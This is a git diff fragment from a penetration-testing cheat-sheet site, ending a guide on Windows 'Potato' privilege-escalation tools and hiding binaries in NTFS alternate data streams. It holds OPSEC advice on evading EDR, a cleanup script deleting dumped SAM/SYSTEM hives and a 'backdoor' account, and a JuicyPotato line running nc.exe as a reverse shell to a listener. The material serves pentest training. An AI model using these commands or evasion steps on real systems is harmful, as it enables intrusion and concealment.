`Zone.Identifier` still naming your web server | ADS on the artefact | + +**OPSEC notes:** + +- Potatoes touch high-signal primitives (Spooler pipe, DCOM). On a monitored estate expect EDR to alert — don't burn a careful engagement on a noisy `net user ... /add`. Prefer a SYSTEM shell/token to standing up a new account. +- `C:\Windows\Temp` is convenient but heavily watched. Rename binaries to something dull; don't leave `GodPotato.exe` on disk. +- ADS defeats a `dir` and a size check, not a defender who runs `dir /r` / `streams.exe` — treat it as *reduces casual visibility*, not *invisible*. + +**Cleanup checklist:** + +```powershell +Remove-Item C:\Windows\Temp\ps.exe, C:\Windows\Temp\g.exe -Force -ErrorAction SilentlyContinue +Remove-Item C:\Windows\Temp\sam.sav, C:\Windows\Temp\sys.sav -Force -ErrorAction SilentlyContinue +Remove-Item C:\Windows\Temp\log.txt -Stream g.exe -ErrorAction SilentlyContinue # the ADS +net user backdoor /del 2>$null # if you created one +``` + +--- + +## References `fas:BookOpen` + +| Tool / topic | Source | +|---|---| +| PrintSpoofer | [github.com/itm4n/PrintSpoofer](https://github.com/itm4n/PrintSpoofer) · [itm4n write-up](https://itm4n.github.io/printspoofer-abusing-impersonation-privileges/) | +| GodPotato | [github.com/BeichenDream/GodPotato](https://github.com/BeichenDream/GodPotato) | +| JuicyPotatoNG | [github.com/antonioCoco/JuicyPotatoNG](https://github.com/antonioCoco/JuicyPotatoNG) | +| JuicyPotato (legacy) | [github.com/ohpe/juicy-potato](https://github.com/ohpe/juicy-potato) | +| RoguePotato | [github.com/antonioCoco/RoguePotato](https://github.com/antonioCoco/RoguePotato) | +| EfsPotato | [github.com/zcgonvh/EfsPotato](https://github.com/zcgonvh/EfsPotato) | +| SweetPotato | [github.com/CCob/SweetPotato](https://github.com/CCob/SweetPotato) | +| The Potato family, explained | [jlajara.gitlab.io — potatoes](https://jlajara.gitlab.io/Potatoes_Windows_Privesc) | +| NTFS ADS / Mark-of-the-Web | [MITRE ATT&CK T1564.004](https://attack.mitre.org/techniques/T1564/004/) · [Sysinternals streams](https://learn.microsoft.com/sysinternals/downloads/streams) | + +--- + +[← Windows PrivEsc cheat sheet](/sheets/pentest-workflow/windows-privesc-cpts) · [Workflow dashboard](/sheets/pentest-workflow/attacking-common-modules-dashboard) · [Windows PrivEsc master guide →](/sheets/privilege-escalation/windows-privesc) +\ No newline at end of file diff --git a/src/content/sheets/pentest-workflow/windows-privesc-cpts.md b/src/content/sheets/pentest-workflow/windows-privesc-cpts.md @@ -175,6 +175,7 @@ JuicyPotato.exe -l 53375 -p c:\windows\system32\cmd.exe -a "/c c:\tools\nc.exe 1 > 3. **RoguePotato** — legacy OXID resolver trick for when outbound DCOM to your listener is blocked (needs a redirector on port 135). > 4. **JuicyPotato** — legacy, dead ≥ Server 2019 / Win10 1809 (DCOM hardening); keep for 2016-and-older targets. > Catch callbacks with `nc -lnvp 8443`. +> Full walk-through — every flag for PrintSpoofer / GodPotato / JuicyPotatoNG / RoguePotato / EfsPotato / SweetPotato, delivery from MSSQL/IIS/WinRM, and hiding the kit in an ADS: [Potato Attacks & ADS guide](/sheets/pentest-workflow/potato-attacks-and-ads-guide). **`SeDebugPrivilege` → dump LSASS / steal a SYSTEM token:** ```batch